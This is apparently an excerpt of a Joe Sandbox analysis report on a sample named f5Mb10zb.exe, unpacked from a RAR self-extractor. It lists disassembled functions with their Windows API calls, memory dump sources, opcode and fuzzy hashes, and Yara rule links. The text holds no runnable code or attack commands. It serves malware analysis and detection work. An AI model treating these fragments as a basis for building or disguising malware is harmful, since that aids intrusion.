                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 2252061734-0
                                                                                    • Opcode ID: 87a2abc0fa0b3d797f9d0635944ecc6e9ea9e155e915bcfcd0be25439fcab906
                                                                                    • Instruction ID: 0e95a7b51125317d645d3f4857223bebe8fc7d07cd2dabafcf8f98ee75ffc460
                                                                                    • Opcode Fuzzy Hash: 87a2abc0fa0b3d797f9d0635944ecc6e9ea9e155e915bcfcd0be25439fcab906
                                                                                    • Instruction Fuzzy Hash: 0551D271A00212EFDB298F24D889BBA77A4FF54311F64452DFC01875A2D739ED62DBA0
                                                                                    Function 0074BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0074BF39
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074BF5C
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074BF82
                                                                                    • _free.LIBCMT ref: 0074BF95
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074BFA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
                                                                                    • Opcode ID: 39c6be850867b647ff665dfa033cde0b480b2430f09a65ac91e823c37ad1ca48
                                                                                    • Instruction ID: 825c89cfb70f14cc2deb8cab1de6d36bff78bb4aa3f4ed4b103d9bdddb3778d4
                                                                                    • Opcode Fuzzy Hash: 39c6be850867b647ff665dfa033cde0b480b2430f09a65ac91e823c37ad1ca48
                                                                                    • Instruction Fuzzy Hash: 2901F772601B19BF272116BA5C4CCBF6A6DDEC7BA13144129F908C3110EF68CD0595B0
                                                                                    Function 00749869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,007491AD,0074B188,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074986E
                                                                                    • _free.LIBCMT ref: 007498A3
                                                                                    • _free.LIBCMT ref: 007498CA
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498D7
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 5064f86459f58c00187989a1bc75f591bf40b23c5ed009786fea099a09c3ca8d
                                                                                    • Instruction ID: cee4d5d51215897ab04ece455e3510353aca04d976ab76d2c292202c220d4297
                                                                                    • Opcode Fuzzy Hash: 5064f86459f58c00187989a1bc75f591bf40b23c5ed009786fea099a09c3ca8d
                                                                                    • Instruction Fuzzy Hash: 6C01F436285705ABC312676C6C8D96B252EDBD27B27210234F625961A2EF6C8D025269
                                                                                    Function 00730EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007311CF: ResetEvent.KERNEL32(?), ref: 007311E1
                                                                                      • Part of subcall function 007311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007311F5
                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00730F21
                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00730F3B
                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00730F54
                                                                                    • CloseHandle.KERNEL32(?), ref: 00730F60
                                                                                    • CloseHandle.KERNEL32(?), ref: 00730F6C
                                                                                      • Part of subcall function 00730FE4: WaitForSingleObject.KERNEL32(?,000000FF,00731206,?), ref: 00730FEA
                                                                                      • Part of subcall function 00730FE4: GetLastError.KERNEL32(?), ref: 00730FF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1868215902-0
                                                                                    • Opcode ID: 3788c3ffb95ce6dcc421e0ef90738e7f345421523ddca281dfba1e8f20d64e25
                                                                                    • Instruction ID: 62d3337db20ed940260765de13d2b958ebde19fcb7718ee8dce313da6728d6cb
                                                                                    • Opcode Fuzzy Hash: 3788c3ffb95ce6dcc421e0ef90738e7f345421523ddca281dfba1e8f20d64e25
                                                                                    • Instruction Fuzzy Hash: C901B571000744EFD7229B64DC84FC6FBAAFB08751F004929F15B521A1C7B97A44CB94
                                                                                    Function 0074C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0074C817
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 0074C829
                                                                                    • _free.LIBCMT ref: 0074C83B
                                                                                    • _free.LIBCMT ref: 0074C84D
                                                                                    • _free.LIBCMT ref: 0074C85F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 0040da9b478757fc0a130595cd8b9d51bdd58cc77b47ca290a1024489ec08e86
                                                                                    • Instruction ID: 837bda020243c7918bec2736a3b70f9f39d05d7ac6a0c76a8c6c72806349d9cd
                                                                                    • Opcode Fuzzy Hash: 0040da9b478757fc0a130595cd8b9d51bdd58cc77b47ca290a1024489ec08e86
                                                                                    • Instruction Fuzzy Hash: 4CF09632A12304EBD6A5DB68F58AC4B73EDAB147117584819F108D7552CFBCFC80CE99
                                                                                    Function 00731FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00731FE5
                                                                                    • _wcslen.LIBCMT ref: 00731FF6
                                                                                    • _wcslen.LIBCMT ref: 00732006
                                                                                    • _wcslen.LIBCMT ref: 00732014
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0072B371,?,?,00000000,?,?,?), ref: 0073202F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CompareString
                                                                                    • String ID:
                                                                                    • API String ID: 3397213944-0
                                                                                    • Opcode ID: 96c012a77d02175d185ec093e6b97b7574fb4f2cad42074308f68ce5b9e45e8b
                                                                                    • Instruction ID: d1b4060287cd44061a0ab808f6f24c08de39282c91a597f152d4aec4ab64f34f
                                                                                    • Opcode Fuzzy Hash: 96c012a77d02175d185ec093e6b97b7574fb4f2cad42074308f68ce5b9e45e8b
                                                                                    • Instruction Fuzzy Hash: C6F06D32008124BBDF261F50EC09DCE3F26EB40770F118045F62A5A062CB769666D790
                                                                                    Function 007315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    • Opcode ID: c3bdd350b7114e023515c7a658622c52efc3690da9b48fd9c8f0646840168b9a
                                                                                    • Instruction ID: 005211d984a964b8d6c9c0ff07546213791371c27341c40abb5e970caeb7a161
                                                                                    • Opcode Fuzzy Hash: c3bdd350b7114e023515c7a658622c52efc3690da9b48fd9c8f0646840168b9a
                                                                                    • Instruction Fuzzy Hash: C4510875288300F6F7211AE08D4BF757765AB05B04FA88546F386784E3DDBEA460A71F
                                                                                    Function 00747F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe,00000104), ref: 00747FAE
                                                                                    • _free.LIBCMT ref: 00748079
                                                                                    • _free.LIBCMT ref: 00748083
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                    • API String ID: 2506810119-2165197133
                                                                                    • Opcode ID: f5429e79f3b590f570d3c81e1ec1c242d41f7ca9740a2e2dd99c9456b1124ac6
                                                                                    • Instruction ID: 8038118c6ac1ab48e8b4bb673e156d1af13072be9efbcc9403d54d4ce7a8c304
                                                                                    • Opcode Fuzzy Hash: f5429e79f3b590f570d3c81e1ec1c242d41f7ca9740a2e2dd99c9456b1124ac6
                                                                                    • Instruction Fuzzy Hash: A33191B1A4021CEFDB21DF99D88499EBBFCEF95310F104166F90497221DB798E45CB52
                                                                                    Function 007431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007431FB
                                                                                    • _abort.LIBCMT ref: 00743306
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodePointer_abort
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 948111806-2084237596
                                                                                    • Opcode ID: d5face028c07b41d50a9fc02bdc25dc70bfb0e193bece27c6adafab57b5f41a6
                                                                                    • Instruction ID: cb9d8e94a856b29b134e807ea031e5476bb86cceb0631f874f48a8091061731c
                                                                                    • Opcode Fuzzy Hash: d5face028c07b41d50a9fc02bdc25dc70bfb0e193bece27c6adafab57b5f41a6
                                                                                    • Instruction Fuzzy Hash: 9F414871900209EFDF15DF98CD82AEEBBB5BF48304F188159F908A7226D379AA51DB50
                                                                                    Function 00727401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00727406
                                                                                      • Part of subcall function 00723BBA: __EH_prolog.LIBCMT ref: 00723BBF
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 007274CD
                                                                                      • Part of subcall function 00727A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00727AAB
                                                                                      • Part of subcall function 00727A9C: GetLastError.KERNEL32 ref: 00727AF1
                                                                                      • Part of subcall function 00727A9C: CloseHandle.KERNEL32(?), ref: 00727B00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3813983858-639343689
                                                                                    • Opcode ID: 2067af4bfbb66f25185468535252ef981bcef817f3853e07d2aeec5105b49eef
                                                                                    • Instruction ID: 14ab132e8c6ac01f8555d702fc899a67e4af369f71233ca539a607b76a1021e1
                                                                                    • Opcode Fuzzy Hash: 2067af4bfbb66f25185468535252ef981bcef817f3853e07d2aeec5105b49eef
                                                                                    • Instruction Fuzzy Hash: 3931C7B1E04268EADF15EBA4ED49FEEBBB9EF09300F048055F805A7192D77C8A44C760
                                                                                    Function 0073AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073AD98
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0073ADAD
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0073ADC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    • Opcode ID: b4f1a344aaf61545b90d33f5a351510daf4b57a458f8f6c9be0360bf22a7aeae
                                                                                    • Instruction ID: 0daaac8adc64665abf365a414fa80421c93ffb67968e095b980bec1c8d57e21f
                                                                                    • Opcode Fuzzy Hash: b4f1a344aaf61545b90d33f5a351510daf4b57a458f8f6c9be0360bf22a7aeae
                                                                                    • Instruction Fuzzy Hash: 3011E632390210BFE711CF68EC0AFAA376DEF4A702F604000F2C0DB5AAC76D99059766
                                                                                    Function 0073DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010486,0073B270,?,?), ref: 0073DE18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogParam
                                                                                    • String ID: GETPASSWORD1$rs$xzw
                                                                                    • API String ID: 665744214-3318730764
                                                                                    • Opcode ID: 24462ceb425b147ec94e3df4bea4b6a1213daf78b93f3799ee9ccfb6950ac145
                                                                                    • Instruction ID: e0b0b3de8aee65c9b4b44b9ac7d132345f23244f5bcda0e665cba20d3fa6b015
                                                                                    • Opcode Fuzzy Hash: 24462ceb425b147ec94e3df4bea4b6a1213daf78b93f3799ee9ccfb6950ac145
                                                                                    • Instruction Fuzzy Hash: 2D110B72640254AAEF22DE34BC06BAB3B94A705751F148075FD4AAB092CBFCAD44C774
                                                                                    Function 0072D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __fprintf_l.LIBCMT ref: 0072D954
                                                                                    • _strncpy.LIBCMT ref: 0072D99A
                                                                                      • Part of subcall function 00731DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00761030,00000200,0072D928,00000000,?,00000050,00761030), ref: 00731DC4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                    • String ID: $%s$@%s
